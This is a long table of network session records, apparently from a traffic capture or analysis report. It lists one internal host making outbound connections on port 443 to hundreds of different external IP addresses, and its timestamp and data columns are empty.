                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17058192.168.2.145515469.70.145.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17059192.168.2.1443130209.159.235.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17060192.168.2.144942073.127.172.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17061192.168.2.144877876.204.36.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17062192.168.2.1440396212.93.21.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17063192.168.2.1454918217.246.36.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17064192.168.2.1437524211.171.242.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17065192.168.2.143346634.16.147.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17066192.168.2.1459808191.91.101.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17067192.168.2.144887487.140.201.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17068192.168.2.145875227.61.221.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17069192.168.2.143861072.47.65.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17070192.168.2.1435856149.160.124.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17071192.168.2.144984650.105.237.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17072192.168.2.1460144163.254.250.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17073192.168.2.1440940182.98.30.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17074192.168.2.143980090.83.177.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17075192.168.2.1447996119.20.55.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17076192.168.2.145926240.150.134.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17077192.168.2.1451644209.85.218.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17078192.168.2.144205848.98.172.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17079192.168.2.1460348194.132.244.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17080192.168.2.1459978121.220.43.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17081192.168.2.1441446213.158.63.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17082192.168.2.1436914182.43.94.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17083192.168.2.1450446113.25.189.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17084192.168.2.144694883.12.1.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17085192.168.2.143596251.5.170.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17086192.168.2.1459962222.192.75.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17087192.168.2.1450476131.71.169.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17088192.168.2.1437790138.165.150.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17089192.168.2.144277492.92.19.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17090192.168.2.143422092.237.95.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17091192.168.2.1437450111.214.186.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17092192.168.2.1443066161.23.187.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17093192.168.2.1450400121.144.36.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17094192.168.2.1446886109.164.240.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17095192.168.2.143686623.204.185.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17096192.168.2.1449976153.29.82.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17097192.168.2.144355480.84.205.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17098192.168.2.1453144190.173.163.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17099192.168.2.1441162222.58.245.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17100192.168.2.144317813.33.30.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17101192.168.2.1449462190.209.67.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17102192.168.2.1439642143.31.88.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17103192.168.2.143683251.123.173.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17104192.168.2.146076019.134.202.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17105192.168.2.145989677.141.108.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17106192.168.2.1453104101.230.130.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17107192.168.2.143695474.192.57.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17108192.168.2.144410240.209.230.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17109192.168.2.144173268.45.13.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17110192.168.2.1453012182.26.60.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17111192.168.2.1454506104.196.191.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17112192.168.2.1458422178.19.83.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17113192.168.2.1442458136.143.22.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17114192.168.2.145841023.107.182.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17115192.168.2.1442084158.176.47.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17116192.168.2.1450818183.106.219.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17117192.168.2.145654671.206.161.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17118192.168.2.1454282113.159.183.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17119192.168.2.144785424.171.235.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17120192.168.2.1449380126.86.58.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17121192.168.2.1454440219.133.168.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17122192.168.2.1433032106.29.202.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17123192.168.2.1441332126.92.180.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17124192.168.2.14521924.78.177.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17125192.168.2.1442228111.253.66.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17126192.168.2.143766064.172.124.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17127192.168.2.1439560120.122.10.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17128192.168.2.1459902185.71.16.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17129192.168.2.1434458201.68.229.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17130192.168.2.145740225.76.142.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17131192.168.2.1439666132.50.185.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17132192.168.2.143906613.147.89.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17133192.168.2.1434286223.120.228.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17134192.168.2.1455838186.96.193.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17135192.168.2.1438754142.112.18.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17136192.168.2.14470684.153.69.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17137192.168.2.144975613.184.165.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17138192.168.2.1437030183.167.103.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17139192.168.2.143742636.115.74.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17140192.168.2.1448882141.55.117.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17141192.168.2.14501749.187.101.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17142192.168.2.1458688148.42.32.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17143192.168.2.1443304189.255.45.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17144192.168.2.1457686102.141.206.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17145192.168.2.144945463.121.78.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17146192.168.2.1435664162.99.6.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17147192.168.2.144390224.195.2.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17148192.168.2.1456430205.152.17.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17149192.168.2.1449826181.236.235.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17150192.168.2.1453358178.13.134.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17151192.168.2.1451468115.245.73.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17152192.168.2.1454610134.227.45.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17153192.168.2.1442508165.99.112.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17154192.168.2.144388846.17.79.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17155192.168.2.14407981.225.34.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17156192.168.2.144013451.85.148.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17157192.168.2.1460966131.144.225.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17158192.168.2.144331880.70.32.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17159192.168.2.1441290192.223.181.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17160192.168.2.1453652208.56.230.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17161192.168.2.1437814116.136.181.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17162192.168.2.1435524115.78.137.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17163192.168.2.1443564170.143.220.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17164192.168.2.1443120212.147.158.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17165192.168.2.1446226156.31.192.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17166192.168.2.144285261.36.237.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17167192.168.2.1454684157.52.10.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17168192.168.2.1445770112.243.85.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17169192.168.2.1433864161.192.215.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17170192.168.2.1457960183.190.41.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17171192.168.2.1453474196.216.166.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17172192.168.2.1449466138.196.229.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17173192.168.2.1460742188.20.235.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17174192.168.2.143944052.195.106.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17175192.168.2.1434844174.66.62.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17176192.168.2.1457766130.37.130.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17177192.168.2.144127018.89.69.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17178192.168.2.1446264143.40.104.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17179192.168.2.1459462198.134.79.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17180192.168.2.143854292.110.7.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17181192.168.2.14392989.104.173.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17182192.168.2.1440668181.88.198.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17183192.168.2.144054813.249.211.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17184192.168.2.1435680179.133.184.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17185192.168.2.1441920155.45.165.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17186192.168.2.1447410176.207.32.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17187192.168.2.1452658205.57.102.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17188192.168.2.1437026219.159.9.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17189192.168.2.1457636140.234.22.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17190192.168.2.1453906203.73.171.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17191192.168.2.1435978180.211.241.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17192192.168.2.1433820195.129.74.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17193192.168.2.143876651.117.107.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17194192.168.2.1460072110.204.86.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17195192.168.2.1449194207.128.180.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17196192.168.2.14476402.92.200.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17197192.168.2.1459060141.19.238.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17198192.168.2.145686462.255.161.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17199192.168.2.1439922185.199.252.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17200192.168.2.1451198176.231.34.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17201192.168.2.145255283.252.100.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17202192.168.2.144174619.116.44.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17203192.168.2.144387659.97.131.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17204192.168.2.1438222147.12.113.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17205192.168.2.1458544106.35.233.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17206192.168.2.1453822220.112.21.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17207192.168.2.1447206219.11.115.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17208192.168.2.144343258.2.16.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17209192.168.2.1443638190.9.80.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17210192.168.2.14338764.152.124.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17211192.168.2.145356231.134.12.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17212192.168.2.1446258154.134.36.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17213192.168.2.1450646187.16.45.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17214192.168.2.1446564142.235.86.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17215192.168.2.1451528158.33.14.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17216192.168.2.1445334108.198.96.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17217192.168.2.144077252.66.101.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17218192.168.2.1434576100.59.146.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17219192.168.2.1434212134.224.33.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17220192.168.2.1435144114.225.151.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17221192.168.2.145755437.13.183.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17222192.168.2.143382263.193.190.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17223192.168.2.1456214117.94.13.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17224192.168.2.1458802163.168.67.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17225192.168.2.145377835.10.224.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17226192.168.2.143351225.82.202.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17227192.168.2.14344281.174.55.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17228192.168.2.1451242104.116.205.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17229192.168.2.1445936108.241.18.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17230192.168.2.144821481.98.78.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17231192.168.2.1437252128.38.9.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17232192.168.2.144347073.37.234.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17233192.168.2.145862431.68.21.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17234192.168.2.144906624.147.155.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17235192.168.2.145723648.243.30.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17236192.168.2.143578680.156.66.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17237192.168.2.1447858102.36.194.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17238192.168.2.144225871.191.103.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17239192.168.2.1460380182.115.225.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17240192.168.2.1457790165.166.78.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17241192.168.2.1456168187.76.127.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17242192.168.2.1450780190.136.79.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17243192.168.2.1450688110.215.207.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17244192.168.2.144850290.64.169.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17245192.168.2.1442422148.35.146.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17246192.168.2.1452540193.175.215.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17247192.168.2.1435212199.178.45.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17248192.168.2.1444830211.26.164.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17249192.168.2.1447098115.166.61.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17250192.168.2.1438984217.213.95.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17251192.168.2.1436232141.1.250.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17252192.168.2.143679680.202.145.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17253192.168.2.1434016150.59.151.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17254192.168.2.1433290177.106.9.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17255192.168.2.1441396110.74.23.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17256192.168.2.1450480170.20.36.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17257192.168.2.1451596111.170.112.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17258192.168.2.145881648.112.215.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17259192.168.2.1454030163.89.60.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17260192.168.2.144229632.251.165.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17261192.168.2.144501647.123.252.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17262192.168.2.1455582140.40.109.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17263192.168.2.144597463.82.114.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17264192.168.2.1440676152.179.61.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17265192.168.2.1460278135.131.130.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17266192.168.2.144994649.232.71.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17267192.168.2.144358836.174.185.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17268192.168.2.1450218145.165.192.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17269192.168.2.1458402132.239.193.170443
                                                      TimestampBytes transferredDirectionData


